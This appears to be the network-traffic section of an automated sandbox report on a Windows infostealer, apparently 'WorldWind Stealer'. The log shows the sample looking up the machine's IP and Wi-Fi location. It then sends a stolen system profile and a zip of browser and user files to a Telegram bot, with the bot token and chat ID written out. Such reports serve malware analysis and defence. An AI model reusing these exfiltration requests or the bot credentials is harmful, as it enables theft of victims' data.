Aug 13, 2024 21:48:56.650579929 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.650707960 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:56.663007975 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:56.663048029 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.663769960 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.665348053 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:56.665412903 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.915250063 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.915306091 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.915381908 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:56.915421009 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.915448904 CEST	443	49743	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:56.916151047 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:56.918689966 CEST	49743	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:57.032605886 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:57.032692909 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:57.032799959 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:57.033045053 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:57.033078909 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.180757046 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.182640076 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.182693958 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.466059923 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.466219902 CEST	443	49744	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.466415882 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.466969013 CEST	49744	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.614240885 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.614330053 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:58.618412018 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.619055986 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:58.619132996 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:59.877773046 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:48:59.879887104 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:48:59.879945993 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.247746944 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.247824907 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.248842001 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.248856068 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249043941 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249089956 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249212027 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249249935 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249281883 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249296904 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249347925 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249382973 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249404907 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249412060 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249463081 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249562025 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249602079 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249692917 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249775887 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.249866009 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249979973 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.249986887 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.250026941 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.250088930 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.250103951 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.432454109 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.479352951 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.838864088 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.839025974 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.839098930 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.839462996 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.841104984 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.841164112 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:00.841244936 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.841509104 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:00.841536045 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.452096939 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.457982063 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.458060980 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.753576040 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.754393101 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.754393101 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.754462957 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.754523993 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.754796982 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.754839897 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.754996061 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755158901 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.755297899 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755337000 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.755359888 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755378008 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.755433083 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755450964 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.755485058 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755501032 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:01.755511045 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:01.756021023 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:02.208554029 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:02.208708048 CEST	443	49746	149.154.167.220	192.168.2.4
Aug 13, 2024 21:49:02.209031105 CEST	49746	443	192.168.2.4	149.154.167.220
Aug 13, 2024 21:49:02.211206913 CEST	49746	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 13, 2024 21:48:53.766128063 CEST	64958	53	192.168.2.4	1.1.1.1
Aug 13, 2024 21:48:53.775346994 CEST	53	64958	1.1.1.1	192.168.2.4
Aug 13, 2024 21:48:53.907340050 CEST	53519	53	192.168.2.4	1.1.1.1
Aug 13, 2024 21:48:53.915663958 CEST	53	53519	1.1.1.1	192.168.2.4
Aug 13, 2024 21:48:54.557135105 CEST	49311	53	192.168.2.4	1.1.1.1
Aug 13, 2024 21:48:54.567019939 CEST	53	49311	1.1.1.1	192.168.2.4
Aug 13, 2024 21:48:55.881959915 CEST	54445	53	192.168.2.4	1.1.1.1
Aug 13, 2024 21:48:55.890739918 CEST	53	54445	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 13, 2024 21:48:53.766128063 CEST	192.168.2.4	1.1.1.1	0x3a9c	Standard query (0)	238.14.8.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Aug 13, 2024 21:48:53.907340050 CEST	192.168.2.4	1.1.1.1	0x883f	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:54.557135105 CEST	192.168.2.4	1.1.1.1	0xa58a	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:55.881959915 CEST	192.168.2.4	1.1.1.1	0x230	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 13, 2024 21:48:53.775346994 CEST	1.1.1.1	192.168.2.4	0x3a9c	Name error (3)	238.14.8.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Aug 13, 2024 21:48:53.915663958 CEST	1.1.1.1	192.168.2.4	0x883f	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:53.915663958 CEST	1.1.1.1	192.168.2.4	0x883f	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:54.567019939 CEST	1.1.1.1	192.168.2.4	0xa58a	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:54.567019939 CEST	1.1.1.1	192.168.2.4	0xa58a	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Aug 13, 2024 21:48:55.890739918 CEST	1.1.1.1	192.168.2.4	0x230	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	104.16.185.241	80	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 21:48:53.971620083 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Aug 13, 2024 21:48:54.482363939 CEST	534	IN	HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 19:48:54 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=xnCOZ5NHV9zRZsFybJd_9WNmuPiuMoRvrezzSBg6ikQ-1723578534-1.0.1.1-hwCmg.cjurGz3hL6B9wm.lJ.dzPRbFRBqoehMvZQmvapwpP_m.ZVj0156Xxa0ZXaRSxujKorCWjSXBbN9.gvlA; path=/; expires=Tue, 13-Aug-24 20:18:54 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8b2b39b02dd60fa8-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	104.21.44.66	443	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-13 19:48:55 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-08-13 19:48:55 UTC	781	IN	HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 19:48:55 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Tue, 13 Aug 2024 19:48:55 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNfkBUGb3u1EkWCi70pd4pRgHRYSg41vv%2Fv6d1UCXS%2FRKlkxc8GSmXcXTTdAL3GE%2FNXirlGn0Y4IRr6p8NiHbZgkgeSPZbrss8TDjPJ3eubY%2BcNB1eJ4IfpnCZNfKwGG5WVw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8b2b39b4be044394-EWR alt-svc: h3=":443"; ma=86400
2024-08-13 19:48:55 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 33 35 37 38 35 33 35 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1723578535}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	149.154.167.220	443	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-13 19:48:56 UTC	1803	OUT	GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-08-13 19:48:56 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 13 Aug 2024 19:48:56 GMT Content-Type: application/json Content-Length: 2073 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-13 19:48:56 UTC	2073	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 37 35 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 39 31 32 30 35 39 37 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 6d 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6d 64 61 34 30 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 30 31 38 32 32 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 68 61 6d 65 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 61 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 75 6b 65 6f 6d 64 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 35 37 38 35 33 36 2c 22 74 65 78 74 22 3a 22 Data Ascii: {"ok":true,"result":{"message_id":147548,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578536,"text":"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	149.154.167.220	443	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-13 19:48:58 UTC	170	OUT	GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-08-13 19:48:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 13 Aug 2024 19:48:58 GMT Content-Type: application/json Content-Length: 295 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-13 19:48:58 UTC	295	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 37 35 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 39 31 32 30 35 39 37 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 6d 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6d 64 61 34 30 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 30 31 38 32 32 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 68 61 6d 65 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 61 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 75 6b 65 6f 6d 64 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 35 37 38 35 33 38 2c 22 74 65 78 74 22 3a 22 Data Ascii: {"ok":true,"result":{"message_id":147549,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578538,"text":"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	149.154.167.220	443	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-13 19:48:59 UTC	253	OUT	POST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1 Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636" Host: api.telegram.org Content-Length: 162674 Expect: 100-continue
2024-08-13 19:49:00 UTC	40	OUT	Data Raw: 2d 2d 61 61 35 63 36 66 37 66 2d 63 33 63 62 2d 34 66 32 64 2d 38 34 35 32 2d 62 33 66 30 62 37 30 34 39 36 33 36 0d 0a Data Ascii: --aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636
2024-08-13 19:49:00 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 5c 6a 6f 6e 65 73 40 35 32 38 31 31 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 25 35 43 6a 6f 6e 65 73 25 34 30 35 32 38 31 31 30 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4a3035c4cb9343f74ca34670ddce645d%5Cuser%40528110_en-
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 78 ab 0d 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKxYBrowsers\Edge\PK~YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK~YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: 7c 5c fa 6c 7e 05 df 60 ad 15 5c 2e c6 42 65 ed c3 95 75 39 ce ad 30 98 b5 9b 01 13 80 d8 69 88 5b 9d 1e d7 59 c0 10 42 2c d5 27 f6 66 f2 7b 3e a5 7c 1b ea 8e ed 7d 2d cc ad b7 f7 49 3a 59 59 a7 ba ef c3 27 e4 a4 ed 40 85 96 b9 b8 f2 22 f9 55 09 c0 8f f7 59 dd 0f c4 72 ae e5 17 e4 e2 8d 60 71 b7 3e 2a cc 16 47 4e 26 d6 e6 36 88 7e dd 7a 32 e6 df bf ff 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 2f 31 d7 cb 82 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 4c 54 4b 4d 59 42 53 45 59 5a 2e 64 6f 63 78 0d 53 49 92 45 21 08 db 77 d5 3f 94 02 8a f3 c3 59 ef 7f 90 76 45 89 01 4d 02 b1 87 74 74 a3 73 4f 5c 1a a3 1c 69 96 81 42 49 c3 b6 54 Data Ascii: \|\l~`\.Beu90i[YB,'f{>\|}-I:YY'@"UYr`q>*GN&6~z2PKT@DW/1>Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docxSIE!w?YvEMttsO\iBIT
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb 37 75 c1 35 1b 3a 17 5e 1f df 36 12 42 91 e6 76 6f 67 c3 81 90 70 6b 1b ef f9 c7 41 e5 cd 3a e7 97 0e 5f 7f 7f fe 00 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 91 6c 91 87 85 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 5a 42 45 44 43 4a 50 42 45 59 2e 6a 70 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 04 15 45 71 9e ef 7f 90 fe bd 81 84 05 54 ea 15 0f 8c 46 2e 60 ae 7e 95 70 0d 12 d0 aa a3 9c Data Ascii: P{(eM=h]od1ad'*Dc".xR[>fj\|/oViw&D7u5:^6BvogpkA:_PKT@DWl?Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\ZBEDCJPBEY.jpgI@!DEqTF.`~p
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: ad 29 d9 06 8b d1 80 9e 93 2f 9f 5a 67 df b8 9b a2 51 f6 3b 25 ba 00 17 6b 3b 61 1e e2 b4 2d b0 24 2e 73 62 59 58 41 1c c2 a7 d6 23 df 0c a5 f3 03 b8 b1 38 70 c0 00 b0 3a f9 61 20 ef 02 8f d2 0f cc 9d 05 04 0d 15 12 11 d9 f2 e7 aa 21 01 03 c2 ca 6b 10 26 56 50 82 b3 ff 25 17 61 8f dc e0 fd 91 74 b0 e0 04 94 20 20 52 ff 17 2c 0e 3a fc a6 7b 00 16 20 95 c3 30 b0 80 60 82 e4 b8 05 23 81 1e 98 de 27 a2 90 60 fe 87 42 a4 33 4b d0 69 05 27 9d 11 d0 9b 02 70 36 b0 93 18 51 3a 16 89 0b ce 19 83 67 a3 71 64 3e 16 11 48 64 96 1b 8c 41 b3 32 99 88 73 20 b0 48 b8 4e 94 c9 88 83 c4 c2 04 19 1e 7a c1 61 38 42 87 ce 5c 68 80 72 41 15 84 b9 69 4e 0f d1 0c 47 66 ef f5 41 05 70 7c d6 18 dd 63 33 03 89 d9 6d 44 31 ca 74 58 0c 09 89 c7 98 f4 73 68 f1 a9 f5 52 3d 75 9a 01 71 Data Ascii: )/ZgQ;%k;a-$.sbYXA#8p:a !k&VP%at R,:{ 0`#'`B3Ki'p6Q:gqd>HdA2s HNza8B\hrAiNGfAp\|c3mD1tXshR=uq
